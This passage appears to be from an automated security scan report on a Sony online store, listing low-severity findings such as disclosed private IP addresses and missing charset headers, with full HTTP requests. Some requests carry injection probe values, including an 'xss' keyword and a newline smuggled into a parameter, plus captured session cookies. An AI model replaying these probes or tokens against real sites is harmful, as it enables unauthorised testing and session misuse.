6.3. http://store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/javascript/s_code.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.sony.com
Path:   /wcsstore/SonyStyleStorefrontAssetStore/javascript/s_code.js

Issue detail

The following email address was disclosed in the response:

Request

GET /wcsstore/SonyStyleStorefrontAssetStore/javascript/s_code.js HTTP/1.1
Host: store.sony.com
Proxy-Connection: keep-alive
Referer: http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; TS5bbf46=959617bd472776e6829f43567043c6625f8782db79e380b64e666affd5df5daf336f8e10

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 12 Aug 2011 22:13:59 GMT
Accept-Ranges: bytes
ntCoent-Length: 35386
Content-Type: application/x-javascript
Content-Length: 35386
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 18:48:33 GMT
Connection: close
Cache-Control: private

/* SiteCatalyst code version: H.19.4.
Copyright 1997-2009 Omniture, Inc. More info available at
http://www.omniture.com */
/************************ ADDITIONAL FEATURES ************************

...[SNIP]...
5trk`F$E)#N=#d($J,(vt#qt`cvt)`j+s.hav()+q+(qs?qs:s.rq(^A)),0#g);qs`n;`am('t')`5s.p_r)s.p_r(`U`d`n}^K(qs);^n`z(@w;`v@w`M^8,`H$b1',vb`U@Y=^V=`N`p=`N^W=`G`m''`5#Z)`G@9@Y=`G@9eo=`G@9^6`p="
+"`G@9^6^W`n`5!id@5s.tc@Ctc=1;s.flush`W()}`2#N`9tl`0o,t,n,vo`1;s.@Y=$Po);`N^W=t;`N`p=n;s.t(@w}`5pg){`G@9co`0o){`I@2\"_\",1,#v`2$Po)`9wd@9gs`0$M{`I@2#Q1,#v`2s.t()`9wd@9dc`0$M{`I@2#Q#v`2s.t()}}@Ll=(`G`"
+"Q`k`8`4$Ns$90`Ud=^E;
...[SNIP]...

7. Private IP addresses disclosed  previous  next
There are 5 instances of this issue:

Issue background

RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.

Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.

Issue remediation

There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.


7.1. http://store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/javascript/omniture.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.sony.com
Path:   /wcsstore/SonyStyleStorefrontAssetStore/javascript/omniture.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /wcsstore/SonyStyleStorefrontAssetStore/javascript/omniture.js HTTP/1.1
Host: store.sony.com
Proxy-Connection: keep-alive
Referer: http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; TS5bbf46=959617bd472776e6829f43567043c6625f8782db79e380b64e666affd5df5daf336f8e10

Response

HTTP/1.1 200 OK
Last-Modified: Wed, 17 Aug 2011 19:11:58 GMT
Accept-Ranges: bytes
ntCoent-Length: 30189
Content-Type: application/x-javascript
Content-Length: 30189
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 18:48:33 GMT
Connection: close
Cache-Control: private

/*
* DEV changelog
*
* 08.04.11 - JT : Adding function trackImpression to populate omniture variable 'prop29' (page state)
* 08.12.11 - JT : Adding code to clear 'prop29' in function 'clearOmni
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...

7.2. http://store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/js/ss_bluray_eventListeners.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.sony.com
Path:   /wcsstore/SonyStyleStorefrontAssetStore/js/ss_bluray_eventListeners.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /wcsstore/SonyStyleStorefrontAssetStore/js/ss_bluray_eventListeners.js HTTP/1.1
Host: store.sony.com
Proxy-Connection: keep-alive
Referer: http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&categoryId=16192&SR=nav:electronics:tv_hm_ent:bluray:shop_compare:ss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; sifrFetch=true; JSESSIONID=0000-iB7fM5Tlv4F_X_Hzj5a05_:14aelsmcl; WC_PERSISTENT=ImH92K9%2bsUdm%2fbC2K7x0esz36a4%3d%0a%3b2011%2d09%2d06+14%3a49%3a35%2e092%5f1315334975092%2d379806%5f0; c_m=undefinedwww.sony.comwww.sony.com; s_channel=%5B%5B%27Other%27%2C%271315352981909%27%5D%5D; TS5bbf46=9061f70286583c9d3554e696bebd0db0238741ed7a8234554e666b3f; mbox=session#1315352920400-736912#1315354843|PC#1315334914578-928682.19#1316562583|check#true#1315353043; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551&eid=437018621; ensUID=249118483jocCbfxsy2s; s_visit=1; s_sq=%5B%5BB%5D%5D; _ensChanVal=Other|1315352981909; __utma=171551074.654425757.1315352924.1315352924.1315352924.1; __utmb=171551074.2.10.1315352924; __utmc=171551074; __utmz=171551074.1315352924.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.s={"v":1,"rid":"1315352924764_554711","cp":{"cybershot":"N","innovation":"N","experts":"N"},"c":"http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay","pv":2,"lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0}; 71737897-VID=5110247826455; 71737897-SKEY=4068440463389764470; HumanClickSiteContainerID_71737897=STANDALONE; s_cc=true

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 15 Jul 2011 18:28:02 GMT
Accept-Ranges: bytes
ntCoent-Length: 14211
Content-Type: application/x-javascript
Content-Length: 14211
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 18:49:52 GMT
Connection: close
Cache-Control: private

/*    SONY | SONY STYLE
*    TV LANDING PAGE Project JS Functions and Event Listeners
*    
*    Authors:
* Alex Jain, Sr Assoiciate Interactive Development | B2C CST SAPE Augmentation team aljain@sapient
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...

7.3. http://store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/js/ss_custom_tabbing.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.sony.com
Path:   /wcsstore/SonyStyleStorefrontAssetStore/js/ss_custom_tabbing.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /wcsstore/SonyStyleStorefrontAssetStore/js/ss_custom_tabbing.js HTTP/1.1
Host: store.sony.com
Proxy-Connection: keep-alive
Referer: http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&categoryId=16192&SR=nav:electronics:tv_hm_ent:bluray:shop_compare:ss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; sifrFetch=true; JSESSIONID=0000-iB7fM5Tlv4F_X_Hzj5a05_:14aelsmcl; WC_PERSISTENT=ImH92K9%2bsUdm%2fbC2K7x0esz36a4%3d%0a%3b2011%2d09%2d06+14%3a49%3a35%2e092%5f1315334975092%2d379806%5f0; c_m=undefinedwww.sony.comwww.sony.com; s_channel=%5B%5B%27Other%27%2C%271315352981909%27%5D%5D; TS5bbf46=9061f70286583c9d3554e696bebd0db0238741ed7a8234554e666b3f; mbox=session#1315352920400-736912#1315354843|PC#1315334914578-928682.19#1316562583|check#true#1315353043; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551&eid=437018621; ensUID=249118483jocCbfxsy2s; s_visit=1; s_sq=%5B%5BB%5D%5D; _ensChanVal=Other|1315352981909; __utma=171551074.654425757.1315352924.1315352924.1315352924.1; __utmb=171551074.2.10.1315352924; __utmc=171551074; __utmz=171551074.1315352924.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.s={"v":1,"rid":"1315352924764_554711","cp":{"cybershot":"N","innovation":"N","experts":"N"},"c":"http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay","pv":2,"lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0}; 71737897-VID=5110247826455; 71737897-SKEY=4068440463389764470; HumanClickSiteContainerID_71737897=STANDALONE; s_cc=true

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 05 Aug 2011 21:36:13 GMT
Accept-Ranges: bytes
ntCoent-Length: 12440
Content-Type: application/x-javascript
Content-Length: 12440
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 18:49:52 GMT
Connection: close
Cache-Control: private

/*******
The Tabbing class

AUTHOR: Jonathan Cheung, Sr. Flash Developer for Sony Style, Sony Electronics
DATE: Feb 16, 2010
DESCRIPTION:
This class can easily provide custom tabbing with deep linking
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...

7.4. http://store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/js/ss_global.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.sony.com
Path:   /wcsstore/SonyStyleStorefrontAssetStore/js/ss_global.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /wcsstore/SonyStyleStorefrontAssetStore/js/ss_global.js HTTP/1.1
Host: store.sony.com
Proxy-Connection: keep-alive
Referer: http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&categoryId=16192&SR=nav:electronics:tv_hm_ent:bluray:shop_compare:ss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; sifrFetch=true; JSESSIONID=0000-iB7fM5Tlv4F_X_Hzj5a05_:14aelsmcl; WC_PERSISTENT=ImH92K9%2bsUdm%2fbC2K7x0esz36a4%3d%0a%3b2011%2d09%2d06+14%3a49%3a35%2e092%5f1315334975092%2d379806%5f0; c_m=undefinedwww.sony.comwww.sony.com; s_channel=%5B%5B%27Other%27%2C%271315352981909%27%5D%5D; TS5bbf46=9061f70286583c9d3554e696bebd0db0238741ed7a8234554e666b3f; mbox=session#1315352920400-736912#1315354843|PC#1315334914578-928682.19#1316562583|check#true#1315353043; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551&eid=437018621; ensUID=249118483jocCbfxsy2s; s_visit=1; s_sq=%5B%5BB%5D%5D; _ensChanVal=Other|1315352981909; __utma=171551074.654425757.1315352924.1315352924.1315352924.1; __utmb=171551074.2.10.1315352924; __utmc=171551074; __utmz=171551074.1315352924.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.s={"v":1,"rid":"1315352924764_554711","cp":{"cybershot":"N","innovation":"N","experts":"N"},"c":"http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay","pv":2,"lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0}; 71737897-VID=5110247826455; 71737897-SKEY=4068440463389764470; HumanClickSiteContainerID_71737897=STANDALONE; s_cc=true

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 30 Jun 2011 22:25:11 GMT
Accept-Ranges: bytes
ntCoent-Length: 15544
Content-Type: application/x-javascript
Content-Length: 15544
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 18:49:52 GMT
Connection: close
Cache-Control: private

if( typeof moduleSpace == 'undefined' ){ var moduleSpace = {}; }
if( typeof utilSpace == 'undefined' ){ var utilSpace = {}; }

//avoiding use of global variables.
//using a global object to store
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...

7.5. http://store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/js/ss_jsf_debug/ss_global.js  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.sony.com
Path:   /wcsstore/SonyStyleStorefrontAssetStore/js/ss_jsf_debug/ss_global.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /wcsstore/SonyStyleStorefrontAssetStore/js/ss_jsf_debug/ss_global.js HTTP/1.1
Host: store.sony.com
Proxy-Connection: keep-alive
Referer: http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; TS5bbf46=959617bd472776e6829f43567043c6625f8782db79e380b64e666affd5df5daf336f8e10

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 01 Sep 2011 22:46:39 GMT
Accept-Ranges: bytes
ntCoent-Length: 15093
Content-Type: application/x-javascript
Content-Length: 15093
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 18:48:33 GMT
Connection: close
Cache-Control: private

if( typeof moduleSpace == 'undefined' ){ var moduleSpace = {}; }
if( typeof utilSpace == 'undefined' ){ var utilSpace = {}; }

//avoiding use of global variables.
//using a global object to store "glo
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...

8. HTML does not specify charset  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.sony.com
Path:   /webapp/wcs/stores/servlet/SYSearchAjax

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.

Request

GET /webapp/wcs/stores/servlet/SYSearchAjax?keyword=xss&storeId=10151&langId=-1&catalogId=10551 HTTP/1.1
Host: store.sony.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
Referer: http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?Ntt=dvd+cd22e7a%0af613d80aa8c&langId=-1&Ntk=Product&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category
Cookie: CompareGrid=; foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353160538_2645%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353161834_303572","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":4.5,"c":"http://www.kb.sony.com/selfservice/microsites/search.do","pv":7,"lc":{"d0":{"v":7,"s":true}},"f":1315353405872,"cp":{"session_id":"c74a1faf4d1c0dea4e31548d301da229","mdl":"6435Y6T45"}}; session_id=c74a1faf4d1c0dea4e31548d301da229; mbox=check#true#1315353593|session#1315353532502-883329#1315355393|PC#1315353532502-883329.19#1316563137; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?Ntt=dvd+cd22e7a%0af613d80aa8c&langId=-1&Ntk=Product&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category; ensUID=24911858XbQLKBqeKLq4; fsr.s={"v":-2,"rid":"1315353161834_303572","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":4.5,"c":"http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog\nf613d80aa8c&langId=-1&Ntk=Product&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category","pv":8,"lc":{"d0":{"v":8,"s":true}},"f":1315353405872,"cp":{"session_id":"c74a1faf4d1c0dea4e31548d301da229","mdl":"6435Y6T45"}}; __utma=171551074.117667101.1315353535.1315353535.1315353535.1; __utmb=171551074.1.10.1315353535; __utmc=171551074; __utmz=171551074.1315353535.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; s_cc=true; s_visit=1; c_m=undefinedwww.fakereferrerdominator.comwww.fakereferrerdominator.com; s_channel=%5B%5B%27Other%27%2C%271315353536253%27%5D%5D; _ensChanVal=Other|1315353536253; 71737897-VID=546022977410; 71737897-SKEY=6355490732959706782; HumanClickSiteContainerID_71737897=STANDALONE; s_sq=sonysonystyle2007prod%3D%2526pid%253Dhttp%25253A//store.sony.com/webapp/wcs/stores/servlet/SearchCatalog%25253FNtt%25253Ddvd%25252Bcd22e7a%2525250af613d80aa8c%252526langId%25253D-1%252526Ntk%25253DProduct%252526storeId%25253D10151%252526Ntx%25253Dmode%25252Bmatchallpartial%252526y%25253D0%252526N%25253D4294951323%252526catalogId%25253D10551%252526x%25253D0%252526navigation%25253DCategory%2526oid%253Dhttp%25253A//store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/img/global/search_submit_arrow.gif%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
ntCoent-Length: 811
Content-Type: text/html
Content-Language: en-US
Content-Length: 811
Date: Tue, 06 Sep 2011 18:58:53 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: TS5bbf46=2b9c93f9c1945f2c1cd8b18716b437e20bd7c268cce2babb4e666d6d; Path=/
Cache-Control: private


{"ResultSet": {
"suggestionList": [
{
"value": "XSS680CX",
"description": "Xpl%26%23333%3Bd%26trade%3B%20CX%20Series%20Speakers",
"img_url": "/wcsstore/SonyStyleStorefrontAssetStore/img/75x49/XSV680C
...[SNIP]...

9. Content type incorrectly stated  previous

Summary

Severity:   Information
Confidence:   Firm
Host:   http://store.sony.com
Path:   /webapp/wcs/stores/servlet/SYSearchAjax

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain JSON.

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

Request

GET /webapp/wcs/stores/servlet/SYSearchAjax?keyword=xss&storeId=10151&langId=-1&catalogId=10551 HTTP/1.1
Host: store.sony.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
Referer: http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?Ntt=dvd+cd22e7a%0af613d80aa8c&langId=-1&Ntk=Product&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category
Cookie: CompareGrid=; foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353160538_2645%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353161834_303572","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":4.5,"c":"http://www.kb.sony.com/selfservice/microsites/search.do","pv":7,"lc":{"d0":{"v":7,"s":true}},"f":1315353405872,"cp":{"session_id":"c74a1faf4d1c0dea4e31548d301da229","mdl":"6435Y6T45"}}; session_id=c74a1faf4d1c0dea4e31548d301da229; mbox=check#true#1315353593|session#1315353532502-883329#1315355393|PC#1315353532502-883329.19#1316563137; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?Ntt=dvd+cd22e7a%0af613d80aa8c&langId=-1&Ntk=Product&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category; ensUID=24911858XbQLKBqeKLq4; fsr.s={"v":-2,"rid":"1315353161834_303572","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":4.5,"c":"http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog\nf613d80aa8c&langId=-1&Ntk=Product&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category","pv":8,"lc":{"d0":{"v":8,"s":true}},"f":1315353405872,"cp":{"session_id":"c74a1faf4d1c0dea4e31548d301da229","mdl":"6435Y6T45"}}; __utma=171551074.117667101.1315353535.1315353535.1315353535.1; __utmb=171551074.1.10.1315353535; __utmc=171551074; __utmz=171551074.1315353535.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; s_cc=true; s_visit=1; c_m=undefinedwww.fakereferrerdominator.comwww.fakereferrerdominator.com; s_channel=%5B%5B%27Other%27%2C%271315353536253%27%5D%5D; _ensChanVal=Other|1315353536253; 71737897-VID=546022977410; 71737897-SKEY=6355490732959706782; HumanClickSiteContainerID_71737897=STANDALONE; 